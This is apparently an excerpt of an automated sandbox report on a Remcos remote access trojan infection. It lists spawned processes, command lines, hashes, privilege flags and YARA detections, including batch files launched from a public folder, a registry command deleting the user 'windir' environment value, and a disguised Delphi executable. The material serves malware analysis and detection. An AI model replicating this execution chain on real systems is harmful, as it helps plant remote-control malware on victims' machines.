                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Start time:20:40:26
                            Start date:27/09/2021
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
                            Imagebase:0x11d0000
                            File size:232960 bytes
                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Start time:20:40:26
                            Start date:27/09/2021
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff724c50000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Start time:20:40:26
                            Start date:27/09/2021
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' '
                            Imagebase:0x11d0000
                            File size:232960 bytes
                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Start time:20:40:27
                            Start date:27/09/2021
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff724c50000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Start time:20:40:27
                            Start date:27/09/2021
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:reg delete hkcu\Environment /v windir /f
                            Imagebase:0x310000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Start time:20:40:28
                            Start date:27/09/2021
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff724c50000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Start time:20:40:31
                            Start date:27/09/2021
                            Path:C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe
                            Wow64 process (32bit):true
                            Commandline:'C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe'
                            Imagebase:0x400000
                            File size:1009152 bytes
                            MD5 hash:3808D4A11CBEE20896CCA28F9A3BCB9B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Antivirus matches:
                            • Detection: 24%, ReversingLabs

                            General

                            Start time:20:40:39
                            Start date:27/09/2021
                            Path:C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe
                            Wow64 process (32bit):true
                            Commandline:'C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe'
                            Imagebase:0x400000
                            File size:1009152 bytes
                            MD5 hash:3808D4A11CBEE20896CCA28F9A3BCB9B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi

                            General

                            Start time:20:40:59
                            Start date:27/09/2021
                            Path:C:\Windows\SysWOW64\mobsync.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\System32\mobsync.exe
                            Imagebase:0x9d0000
                            File size:93184 bytes
                            MD5 hash:44C19378FA529DD88674BAF647EBDC3C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Author: unknown
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000016.00000002.827146573.0000000003178000.00000004.00000020.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000016.00000002.827407780.0000000050601000.00000040.00000001.sdmp, Author: Joe Security

                            General

                            Start time:20:41:16
                            Start date:27/09/2021
                            Path:C:\Windows\SysWOW64\secinit.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\System32\secinit.exe
                            Imagebase:0xb40000
                            File size:9728 bytes
                            MD5 hash:174A363BB5A2D88B224546C15DD10906
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001A.00000002.850111414.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001A.00000002.850111414.0000000000400000.00000040.00000001.sdmp, Author: unknown
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001A.00000002.851109980.0000000050601000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001A.00000002.850918949.0000000003327000.00000004.00000020.sdmp, Author: Joe Security
